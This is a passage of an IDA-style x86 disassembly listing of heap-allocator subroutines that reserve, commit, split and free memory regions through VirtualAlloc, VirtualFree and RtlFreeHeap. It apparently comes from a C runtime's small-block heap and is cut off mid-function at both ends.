; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
add eax, 0Fh
and al, 0F0h
mov [ebp+8], eax
cmp dword ptr [ebp+8], 780h
ja short loc_425D47
mov ecx, [ebp+8]
mov ds:dword_453BDC, ecx
mov eax, 1
jmp short loc_425D49
; ---------------------------------------------------------------------------
loc_425D47: ; CODE XREF: _0:00425D35�j
xor eax, eax
loc_425D49: ; CODE XREF: _0:00425D45�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425D50 proc near ; CODE XREF: _0:00424051�p
; sub_426210+34C�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
cmp ds:dword_451BC8, 0FFFFFFFFh
jnz short loc_425D68
mov [ebp+var_C], offset off_451BB8
jmp short loc_425D8B
; ---------------------------------------------------------------------------
loc_425D68: ; CODE XREF: sub_425D50+D�j
push 2020h
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_425D8B
xor eax, eax
jmp loc_425F2A
; ---------------------------------------------------------------------------
loc_425D8B: ; CODE XREF: sub_425D50+16�j
; sub_425D50+32�j
push 4
push 2000h
push 400000h
push 0
call ds:dword_4F54B4 ; VirtualAlloc
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz loc_425F0C
push 4
push 1000h
push 10000h
mov ecx, [ebp+var_4]
push ecx
call ds:dword_4F54B4 ; VirtualAlloc
test eax, eax
jz loc_425EFB
cmp [ebp+var_C], offset off_451BB8
jnz short loc_425DFB
cmp ds:off_451BB8, 0
jnz short loc_425DE6
mov ds:off_451BB8, offset off_451BB8
loc_425DE6: ; CODE XREF: sub_425D50+8A�j
cmp ds:off_451BBC, 0
jnz short loc_425DF9
mov ds:off_451BBC, offset off_451BB8
loc_425DF9: ; CODE XREF: sub_425D50+9D�j
jmp short loc_425E24
; ---------------------------------------------------------------------------
loc_425DFB: ; CODE XREF: sub_425D50+81�j
mov edx, [ebp+var_C]
mov dword ptr [edx], offset off_451BB8
mov eax, [ebp+var_C]
mov ecx, ds:off_451BBC
mov [eax+4], ecx
mov edx, [ebp+var_C]
mov ds:off_451BBC, edx
mov eax, [ebp+var_C]
mov ecx, [eax+4]
mov edx, [ebp+var_C]
mov [ecx], edx
loc_425E24: ; CODE XREF: sub_425D50:loc_425DF9�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax+10h], ecx
mov edx, [ebp+var_4]
add edx, 400000h
mov eax, [ebp+var_C]
mov [eax+14h], edx
mov ecx, [ebp+var_C]
add ecx, 18h
mov edx, [ebp+var_C]
mov [edx+8], ecx
mov eax, [ebp+var_C]
add eax, 98h
mov ecx, [ebp+var_C]
mov [ecx+0Ch], eax
mov [ebp+var_8], 0
jmp short loc_425E68
; ---------------------------------------------------------------------------
loc_425E5F: ; CODE XREF: sub_425D50+153�j
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
loc_425E68: ; CODE XREF: sub_425D50+10D�j
cmp [ebp+var_8], 400h
jge short loc_425EA5
cmp [ebp+var_8], 10h
jge short loc_425E87
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov dword ptr [ecx+eax*8+18h], 0F0h
jmp short loc_425E95
; ---------------------------------------------------------------------------
loc_425E87: ; CODE XREF: sub_425D50+125�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov dword ptr [eax+edx*8+18h], 0FFFFFFFFh
loc_425E95: ; CODE XREF: sub_425D50+135�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov dword ptr [edx+ecx*8+1Ch], 0F1h
jmp short loc_425E5F
; ---------------------------------------------------------------------------
loc_425EA5: ; CODE XREF: sub_425D50+11F�j
push 10000h
push 0
mov eax, [ebp+var_4]
push eax
call sub_41E4B0
add esp, 0Ch
loc_425EB8: ; CODE XREF: sub_425D50+1A4�j
mov ecx, [ebp+var_C]
mov edx, [ecx+10h]
add edx, 10000h
cmp [ebp+var_4], edx
jnb short loc_425EF6
mov eax, [ebp+var_4]
add eax, 8
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_4]
mov dword ptr [edx+4], 0F0h
mov eax, [ebp+var_4]
mov byte ptr [eax+0F8h], 0FFh
mov ecx, [ebp+var_4]
add ecx, 1000h
mov [ebp+var_4], ecx
jmp short loc_425EB8
; ---------------------------------------------------------------------------
loc_425EF6: ; CODE XREF: sub_425D50+177�j
mov eax, [ebp+var_C]
jmp short loc_425F2A
; ---------------------------------------------------------------------------
loc_425EFB: ; CODE XREF: sub_425D50+74�j
push 8000h
push 0
mov edx, [ebp+var_4]
push edx
call ds:dword_4F54B0 ; VirtualFree
loc_425F0C: ; CODE XREF: sub_425D50+56�j
cmp [ebp+var_C], offset off_451BB8
jz short loc_425F28
mov eax, [ebp+var_C]
push eax
push 0
mov ecx, ds:dword_4F39E8
push ecx
call ds:dword_4F5414 ; RtlFreeHeap
loc_425F28: ; CODE XREF: sub_425D50+1C3�j
xor eax, eax
loc_425F2A: ; CODE XREF: sub_425D50+36�j
; sub_425D50+1A9�j
mov esp, ebp
pop ebp
retn
sub_425D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425F30 proc near ; CODE XREF: sub_425FB0+136�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
push 0
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
push ecx
call ds:dword_4F54B0 ; VirtualFree
mov edx, ds:off_453BD8
cmp edx, [ebp+arg_0]
jnz short loc_425F5E
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov ds:off_453BD8, ecx
loc_425F5E: ; CODE XREF: sub_425F30+20�j
cmp [ebp+arg_0], offset off_451BB8
jz short loc_425F97
mov edx, [ebp+arg_0]
mov eax, [edx+4]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov edx, [ebp+arg_0]
mov eax, [edx+4]
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push ecx
push 0
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F5414 ; RtlFreeHeap
jmp short loc_425FA1
; ---------------------------------------------------------------------------
loc_425F97: ; CODE XREF: sub_425F30+35�j
mov ds:dword_451BC8, 0FFFFFFFFh
loc_425FA1: ; CODE XREF: sub_425F30+65�j
pop ebp
retn
sub_425F30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425FB0 proc near ; CODE XREF: sub_4261A0+60�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:off_451BBC
mov [ebp+var_14], eax
loc_425FBE: ; CODE XREF: sub_425FB0+14D�j
mov ecx, [ebp+var_14]
cmp dword ptr [ecx+10h], 0FFFFFFFFh
jz loc_4260EE
mov [ebp+var_C], 3FFh
mov [ebp+var_10], 0
mov edx, [ebp+var_C]
mov eax, [ebp+var_14]
lea ecx, [eax+edx*8+18h]
mov [ebp+var_4], ecx
jmp short loc_425FFA
; ---------------------------------------------------------------------------
loc_425FE8: ; CODE XREF: sub_425FB0:loc_42607F�j
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
mov eax, [ebp+var_4]
sub eax, 8
mov [ebp+var_4], eax
loc_425FFA: ; CODE XREF: sub_425FB0+36�j
cmp [ebp+var_C], 0
jl loc_426084
mov ecx, [ebp+var_4]
cmp dword ptr [ecx], 0F0h
jnz short loc_42607F
push 4000h
push 1000h
mov edx, [ebp+var_C]
shl edx, 0Ch
mov eax, [ebp+var_14]
mov ecx, [eax+10h]
add ecx, edx
push ecx
call ds:dword_4F54B0 ; VirtualFree
test eax, eax
jz short loc_42607F
mov edx, [ebp+var_4]
mov dword ptr [edx], 0FFFFFFFFh
mov eax, ds:dword_4F33E0
sub eax, 1
mov ds:dword_4F33E0, eax
mov ecx, [ebp+var_14]
cmp dword ptr [ecx+0Ch], 0
jz short loc_42605C
mov edx, [ebp+var_14]
mov eax, [edx+0Ch]
cmp eax, [ebp+var_4]
jbe short loc_426065
loc_42605C: ; CODE XREF: sub_425FB0+9F�j
mov ecx, [ebp+var_14]
mov edx, [ebp+var_4]
mov [ecx+0Ch], edx
loc_426065: ; CODE XREF: sub_425FB0+AA�j
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
mov ecx, [ebp+arg_0]
sub ecx, 1
mov [ebp+arg_0], ecx
cmp [ebp+arg_0], 0
jnz short loc_42607F
jmp short loc_426084
; ---------------------------------------------------------------------------
loc_42607F: ; CODE XREF: sub_425FB0+5D�j
; sub_425FB0+80�j ...
jmp loc_425FE8
; ---------------------------------------------------------------------------
loc_426084: ; CODE XREF: sub_425FB0+4E�j
; sub_425FB0+CD�j
mov edx, [ebp+var_14]
mov [ebp+var_8], edx
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov [ebp+var_14], ecx
cmp [ebp+var_10], 0
jz short loc_4260EE
mov edx, [ebp+var_8]
cmp dword ptr [edx+18h], 0FFFFFFFFh
jnz short loc_4260EE
mov [ebp+var_C], 1
mov eax, [ebp+var_8]
add eax, 20h
mov [ebp+var_4], eax
jmp short loc_4260C6
; ---------------------------------------------------------------------------
loc_4260B4: ; CODE XREF: sub_425FB0+127�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 8
mov [ebp+var_4], edx
loc_4260C6: ; CODE XREF: sub_425FB0+102�j
cmp [ebp+var_C], 400h
jge short loc_4260D9
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4260D9
jmp short loc_4260B4
; ---------------------------------------------------------------------------
loc_4260D9: ; CODE XREF: sub_425FB0+11D�j
; sub_425FB0+125�j
cmp [ebp+var_C], 400h
jnz short loc_4260EE
mov ecx, [ebp+var_8]
push ecx
call sub_425F30
add esp, 4
loc_4260EE: ; CODE XREF: sub_425FB0+15�j
; sub_425FB0+E7�j ...
mov edx, [ebp+var_14]
cmp edx, ds:off_451BBC
jz short loc_426103
cmp [ebp+arg_0], 0
jg loc_425FBE
loc_426103: ; CODE XREF: sub_425FB0+147�j
mov esp, ebp
pop ebp
retn
sub_425FB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426110 proc near ; CODE XREF: sub_41D6B0+B6�p
; sub_423620+12B�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], offset off_451BB8
loc_42611D: ; CODE XREF: sub_426110+88�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
cmp ecx, [eax+10h]
jbe short loc_426189
mov edx, [ebp+var_8]
mov eax, [ebp+arg_0]
cmp eax, [edx+14h]
jnb short loc_426189
mov ecx, [ebp+arg_0]
and ecx, 0Fh
test ecx, ecx
jnz short loc_426185
mov edx, [ebp+arg_0]
and edx, 0FFFh
xor eax, eax
add eax, 100h
cmp edx, eax
jb short loc_426185
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx], edx
mov eax, [ebp+arg_0]
and eax, 0FFFFF000h
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+var_4]
add eax, 100h
mov ecx, [ebp+arg_0]
sub ecx, eax
sar ecx, 4
mov edx, [ebp+var_4]
lea eax, [edx+ecx+8]
jmp short loc_42619C
; ---------------------------------------------------------------------------
loc_426185: ; CODE XREF: sub_426110+2B�j
; sub_426110+3F�j
xor eax, eax
jmp short loc_42619C
; ---------------------------------------------------------------------------
loc_426189: ; CODE XREF: sub_426110+16�j
; sub_426110+21�j
mov eax, [ebp+var_8]
mov ecx, [eax]
mov [ebp+var_8], ecx
cmp [ebp+var_8], offset off_451BB8
jnz short loc_42611D
xor eax, eax
loc_42619C: ; CODE XREF: sub_426110+73�j
; sub_426110+77�j
mov esp, ebp
pop ebp
retn
sub_426110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4261A0 proc near ; CODE XREF: sub_423830+340�p
; sub_423830+3AD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
mov edx, [ebp+arg_0]
lea eax, [edx+ecx*8+18h]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+var_4]
mov ecx, [eax]
add ecx, edx
mov edx, [ebp+var_4]
mov [edx], ecx
mov eax, [ebp+arg_8]
mov byte ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0F1h
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0F0h
jnz short loc_426208
mov eax, ds:dword_4F33E0
add eax, 1
mov ds:dword_4F33E0, eax
cmp ds:dword_4F33E0, 20h
jnz short loc_426208
push 10h
call sub_425FB0
add esp, 4
loc_426208: ; CODE XREF: sub_4261A0+46�j
; sub_4261A0+5C�j
mov esp, ebp
pop ebp
retn
sub_4261A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426210 proc near ; CODE XREF: sub_4234C0+CE�p
; sub_423830+2EC�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:off_453BD8
mov [ebp+var_20], eax
loc_42621E: ; CODE XREF: sub_426210+188�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+10h], 0FFFFFFFFh
jz loc_426387
mov edx, [ebp+var_20]
mov eax, [edx+8]
mov [ebp+var_4], eax
mov ecx, [ebp+var_20]
add ecx, 2018h
mov [ebp+var_10], ecx
mov edx, [ebp+var_20]
add edx, 18h
mov eax, [ebp+var_4]
sub eax, edx
sar eax, 3
shl eax, 0Ch
mov ecx, [ebp+var_20]
mov edx, [ecx+10h]
add edx, eax
mov [ebp+var_8], edx
jmp short loc_426273
; ---------------------------------------------------------------------------
loc_42625E: ; CODE XREF: sub_426210:loc_4262DF�j
mov eax, [ebp+var_4]
add eax, 8
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, 1000h
mov [ebp+var_8], ecx
loc_426273: ; CODE XREF: sub_426210+4C�j
mov edx, [ebp+var_4]
cmp edx, [ebp+var_10]
jnb short loc_4262E4
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, [ebp+arg_0]
jl short loc_4262DF
mov edx, [ebp+var_4]
mov eax, [edx+4]
cmp eax, [ebp+arg_0]
jbe short loc_4262DF
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_4]
mov eax, [edx]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_4265D0
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4262D6
mov edx, [ebp+var_20]
mov ds:off_453BD8, edx
mov eax, [ebp+var_4]
mov ecx, [eax]
sub ecx, [ebp+arg_0]
mov edx, [ebp+var_4]
mov [edx], ecx
mov eax, [ebp+var_20]
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov eax, [ebp+var_C]
jmp loc_4265C4
; ---------------------------------------------------------------------------
loc_4262D6: ; CODE XREF: sub_426210+9D�j
mov edx, [ebp+var_4]
mov eax, [ebp+arg_0]
mov [edx+4], eax
loc_4262DF: ; CODE XREF: sub_426210+73�j
; sub_426210+7E�j
jmp loc_42625E
; ---------------------------------------------------------------------------
loc_4262E4: ; CODE XREF: sub_426210+69�j
mov ecx, [ebp+var_20]
add ecx, 18h
mov [ebp+var_4], ecx
mov edx, [ebp+var_20]
mov eax, [edx+8]
mov [ebp+var_10], eax
mov ecx, [ebp+var_20]
mov edx, [ecx+10h]
mov [ebp+var_8], edx
jmp short loc_426316
; ---------------------------------------------------------------------------
loc_426301: ; CODE XREF: sub_426210:loc_426382�j
mov eax, [ebp+var_4]
add eax, 8
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, 1000h
mov [ebp+var_8], ecx
loc_426316: ; CODE XREF: sub_426210+EF�j
mov edx, [ebp+var_4]
cmp edx, [ebp+var_10]
jnb short loc_426387
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, [ebp+arg_0]
jl short loc_426382
mov edx, [ebp+var_4]
mov eax, [edx+4]
cmp eax, [ebp+arg_0]
jbe short loc_426382
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_4]
mov eax, [edx]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_4265D0
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_426379
mov edx, [ebp+var_20]
mov ds:off_453BD8, edx
mov eax, [ebp+var_4]
mov ecx, [eax]
sub ecx, [ebp+arg_0]
mov edx, [ebp+var_4]
mov [edx], ecx
mov eax, [ebp+var_20]
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov eax, [ebp+var_C]
jmp loc_4265C4
; ---------------------------------------------------------------------------
loc_426379: ; CODE XREF: sub_426210+140�j
mov edx, [ebp+var_4]
mov eax, [ebp+arg_0]
mov [edx+4], eax
loc_426382: ; CODE XREF: sub_426210+116�j
; sub_426210+121�j
jmp loc_426301
; ---------------------------------------------------------------------------
loc_426387: ; CODE XREF: sub_426210+15�j
; sub_426210+10C�j
mov ecx, [ebp+var_20]
mov edx, [ecx]
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
cmp eax, ds:off_453BD8
jnz loc_42621E
mov [ebp+var_20], offset off_451BB8
loc_4263A5: ; CODE XREF: sub_426210+346�j
mov ecx, [ebp+var_20]
cmp dword ptr [ecx+10h], 0FFFFFFFFh
jz loc_426547
mov edx, [ebp+var_20]
cmp dword ptr [edx+0Ch], 0
jz loc_426547
mov eax, [ebp+var_20]
mov ecx, [eax+0Ch]
mov [ebp+var_4], ecx
mov edx, [ebp+var_20]
add edx, 18h
mov eax, [ebp+var_4]
sub eax, edx
sar eax, 3
shl eax, 0Ch
mov ecx, [ebp+var_20]
mov edx, [ecx+10h]
add edx, eax
mov [ebp+var_8], edx
mov [ebp+var_14], 0
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
jmp short loc_426405
; ---------------------------------------------------------------------------
loc_4263F3: ; CODE XREF: sub_426210+203�j
mov ecx, [ebp+var_10]
add ecx, 8
mov [ebp+var_10], ecx
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
loc_426405: ; CODE XREF: sub_426210+1E1�j
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_426415
cmp [ebp+var_14], 10h
jge short loc_426415
jmp short loc_4263F3
; ---------------------------------------------------------------------------
loc_426415: ; CODE XREF: sub_426210+1FB�j
; sub_426210+201�j
push 4
push 1000h
mov ecx, [ebp+var_14]
shl ecx, 0Ch
push ecx
mov edx, [ebp+var_8]
push edx
call ds:dword_4F54B4 ; VirtualAlloc
cmp eax, [ebp+var_8]
jnz loc_426543
push 0
mov eax, [ebp+var_14]
shl eax, 0Ch
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_18], 0
mov edx, [ebp+var_8]
mov [ebp+var_1C], edx
mov eax, [ebp+var_4]
mov [ebp+var_10], eax
jmp short loc_42647E
; ---------------------------------------------------------------------------
loc_426460: ; CODE XREF: sub_426210+2A8�j
mov ecx, [ebp+var_18]
add ecx, 1
mov [ebp+var_18], ecx
mov edx, [ebp+var_1C]
add edx, 1000h
mov [ebp+var_1C], edx
mov eax, [ebp+var_10]
add eax, 8
mov [ebp+var_10], eax
loc_42647E: ; CODE XREF: sub_426210+24E�j
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_14]
jge short loc_4264BA
mov edx, [ebp+var_1C]
add edx, 8
mov eax, [ebp+var_1C]
mov [eax], edx
mov ecx, [ebp+var_1C]
mov dword ptr [ecx+4], 0F0h
mov edx, [ebp+var_1C]
mov byte ptr [edx+0F8h], 0FFh
mov eax, [ebp+var_10]
mov dword ptr [eax], 0F0h
mov ecx, [ebp+var_10]
mov dword ptr [ecx+4], 0F1h
jmp short loc_426460
; ---------------------------------------------------------------------------
loc_4264BA: ; CODE XREF: sub_426210+274�j
mov edx, [ebp+var_20]
mov ds:off_453BD8, edx
loc_4264C3: ; CODE XREF: sub_426210+2D1�j
mov eax, [ebp+var_20]
add eax, 2018h
cmp [ebp+var_10], eax
jnb short loc_4264E3
mov ecx, [ebp+var_10]
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_4264E3
mov edx, [ebp+var_10]
add edx, 8
mov [ebp+var_10], edx
jmp short loc_4264C3
; ---------------------------------------------------------------------------
loc_4264E3: ; CODE XREF: sub_426210+2BE�j
; sub_426210+2C6�j
mov eax, [ebp+var_20]
add eax, 2018h
cmp [ebp+var_10], eax
sbb ecx, ecx
and ecx, [ebp+var_10]
mov edx, [ebp+var_20]
mov [edx+0Ch], ecx
mov eax, [ebp+var_8]
mov cl, byte ptr [ebp+arg_0]
mov [eax+8], cl
mov edx, [ebp+var_20]
mov eax, [ebp+var_4]
mov [edx+8], eax
mov ecx, [ebp+var_4]
mov edx, [ecx]
sub edx, [ebp+arg_0]
mov eax, [ebp+var_4]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
lea eax, [edx+ecx+8]
mov ecx, [ebp+var_8]
mov [ecx], eax
mov edx, [ebp+var_8]
mov eax, [edx+4]
sub eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov eax, [ebp+var_8]
add eax, 100h
jmp loc_4265C4
; ---------------------------------------------------------------------------
loc_426543: ; CODE XREF: sub_426210+220�j
xor eax, eax
jmp short loc_4265C4
; ---------------------------------------------------------------------------
loc_426547: ; CODE XREF: sub_426210+19C�j
; sub_426210+1A9�j
mov edx, [ebp+var_20]
mov eax, [edx]
mov [ebp+var_20], eax
cmp [ebp+var_20], offset off_451BB8
jnz loc_4263A5
call sub_425D50
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4265C2
mov ecx, [ebp+var_20]
mov edx, [ecx+10h]
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
mov cl, byte ptr [ebp+arg_0]
mov [eax+8], cl
mov edx, [ebp+var_20]
mov ds:off_453BD8, edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax+8]
mov eax, [ebp+var_8]
mov [eax], edx
mov ecx, 0F0h
sub ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
and eax, 0FFh
mov ecx, [ebp+var_20]
mov edx, [ecx+18h]
sub edx, eax
mov eax, [ebp+var_20]
mov [eax+18h], edx
mov eax, [ebp+var_8]
add eax, 100h
jmp short loc_4265C4
; ---------------------------------------------------------------------------
loc_4265C2: ; CODE XREF: sub_426210+358�j
xor eax, eax
loc_4265C4: ; CODE XREF: sub_426210+C1�j
; sub_426210+164�j ...
mov esp, ebp
pop ebp
retn
sub_426210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4265D0 proc near ; CODE XREF: sub_426210+8E�p
; sub_426210+131�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
add eax, 0F8h
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
cmp edx, [ebp+arg_8]
jb short loc_42665D
mov eax, [ebp+var_8]
mov cl, byte ptr [ebp+arg_8]
mov [eax], cl
mov edx, [ebp+var_8]
add edx, [ebp+arg_8]
cmp edx, [ebp+var_14]
jnb short loc_42662B
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, [ebp+arg_8]
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, [ebp+arg_8]
mov edx, [ebp+arg_0]
mov [edx+4], ecx
jmp short loc_426640
; ---------------------------------------------------------------------------
loc_42662B: ; CODE XREF: sub_4265D0+3B�j
mov eax, [ebp+arg_0]
add eax, 8
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov edx, [ebp+arg_0]
mov dword ptr [edx+4], 0
loc_426640: ; CODE XREF: sub_4265D0+59�j
mov eax, [ebp+arg_0]
add eax, 8
mov ecx, [ebp+var_8]
sub ecx, eax
shl ecx, 4
mov edx, [ebp+arg_0]
lea eax, [edx+ecx+100h]
jmp loc_426875
; ---------------------------------------------------------------------------
loc_42665D: ; CODE XREF: sub_4265D0+28�j
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov edx, [ebp+var_8]
xor eax, eax
mov al, [edx+ecx]
test eax, eax
jz short loc_42667B
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
add edx, [ecx+4]
mov [ebp+var_8], edx
loc_42667B: ; CODE XREF: sub_4265D0+9D�j
; sub_4265D0:loc_426774�j
mov eax, [ebp+var_8]
add eax, [ebp+arg_8]
cmp eax, [ebp+var_14]
jnb loc_426779
mov ecx, [ebp+var_8]
xor edx, edx
mov dl, [ecx]
test edx, edx
jnz loc_426765
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_C], eax
mov [ebp+var_10], 1
jmp short loc_4266BD
; ---------------------------------------------------------------------------
loc_4266AB: ; CODE XREF: sub_4265D0+F8�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
loc_4266BD: ; CODE XREF: sub_4265D0+D9�j
mov eax, [ebp+var_C]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jnz short loc_4266CA
jmp short loc_4266AB
; ---------------------------------------------------------------------------
loc_4266CA: ; CODE XREF: sub_4265D0+F6�j
mov edx, [ebp+var_10]
cmp edx, [ebp+arg_8]
jnb short loc_426705
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4]
jnz short loc_4266E5
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
mov [ecx+4], edx
jmp short loc_4266FD
; ---------------------------------------------------------------------------
loc_4266E5: ; CODE XREF: sub_4265D0+108�j
mov eax, [ebp+arg_4]
sub eax, [ebp+var_10]
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_4266FD
xor eax, eax
jmp loc_426875
; ---------------------------------------------------------------------------
loc_4266FD: ; CODE XREF: sub_4265D0+113�j
; sub_4265D0+124�j
mov edx, [ebp+var_C]
mov [ebp+var_8], edx
jmp short loc_426763
; ---------------------------------------------------------------------------
loc_426705: ; CODE XREF: sub_4265D0+100�j
mov eax, [ebp+var_8]
add eax, [ebp+arg_8]
cmp eax, [ebp+var_14]
jnb short loc_426729
mov ecx, [ebp+var_8]
add ecx, [ebp+arg_8]
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+var_10]
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
jmp short loc_42673E
; ---------------------------------------------------------------------------
loc_426729: ; CODE XREF: sub_4265D0+13E�j
mov edx, [ebp+arg_0]
add edx, 8
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+4], 0
loc_42673E: ; CODE XREF: sub_4265D0+157�j
mov edx, [ebp+var_8]
mov al, byte ptr [ebp+arg_8]
mov [edx], al
mov ecx, [ebp+arg_0]
add ecx, 8
mov edx, [ebp+var_8]
sub edx, ecx
shl edx, 4
mov eax, [ebp+arg_0]
lea eax, [eax+edx+100h]
jmp loc_426875
; ---------------------------------------------------------------------------
loc_426763: ; CODE XREF: sub_4265D0+133�j
jmp short loc_426774
; ---------------------------------------------------------------------------
loc_426765: ; CODE XREF: sub_4265D0+C3�j
mov ecx, [ebp+var_8]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
loc_426774: ; CODE XREF: sub_4265D0:loc_426763�j
jmp loc_42667B
; ---------------------------------------------------------------------------
loc_426779: ; CODE XREF: sub_4265D0+B4�j
mov ecx, [ebp+arg_0]
add ecx, 8
mov [ebp+var_8], ecx
loc_426782: ; CODE XREF: sub_4265D0:loc_42686E�j
mov edx, [ebp+var_8]
cmp edx, [ebp+var_4]
jnb loc_426873
mov eax, [ebp+var_8]
